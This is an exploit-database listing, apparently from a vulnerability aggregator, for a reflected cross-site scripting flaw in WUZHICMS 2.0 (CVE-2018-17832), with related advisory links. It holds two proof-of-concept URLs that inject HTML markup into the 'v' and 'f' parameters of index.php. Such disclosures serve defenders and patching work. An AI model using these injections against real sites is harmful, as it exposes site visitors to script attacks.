Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtRenzi1337DAY-ID-31241
HistoryOct 02, 2018 - 12:00 a.m.

WUZHICMS 2.0 - Cross-Site Scripting Vulnerability

2018-10-0200:00:00
Renzi
0day.today
19

EPSS

0.001

Percentile

45.5%

JSON

Exploit for php platform in category web applications

# Title: WUZHICMS 2.0 - Cross-Site Scripting 
# Author: Felipe "Renzi" Gabriel
# Vendor: http://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832
  
# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0  web-application.
# The vulnerability is located in the 'v' and  'f' parameters of the`index.php` action GET method request.
    
# PoC
 
http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
 
http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>

#  0day.today [2018-10-03]  #

Related

prion 1
exploitdb 1
cvelist 1
nvd 1
packetstorm 1
exploitpack 1
cve 1
prion
prion
Cross site scripting
2018-10-01 08:29:00
exploitdb
exploitdb
WUZHICMS 2.0 - Cross-Site Scripting
2018-10-01 00:00:00
cvelist
cvelist
CVE-2018-17832
2018-10-01 08:00:00
nvd
nvd
CVE-2018-17832
2018-10-01 08:29:01
packetstorm
packetstorm
WUZHICMS 2.0 Cross Site Scripting
2018-10-01 00:00:00
exploitpack
exploitpack
WUZHICMS 2.0 - Cross-Site Scripting
2018-10-01 00:00:00
cve
cve
CVE-2018-17832
2018-10-01 08:29:01

EPSS

0.001

Percentile

45.5%

JSON
Related for 1337DAY-ID-31241
prion1exploitdb1cvelist1nvd1packetstorm1exploitpack1cve1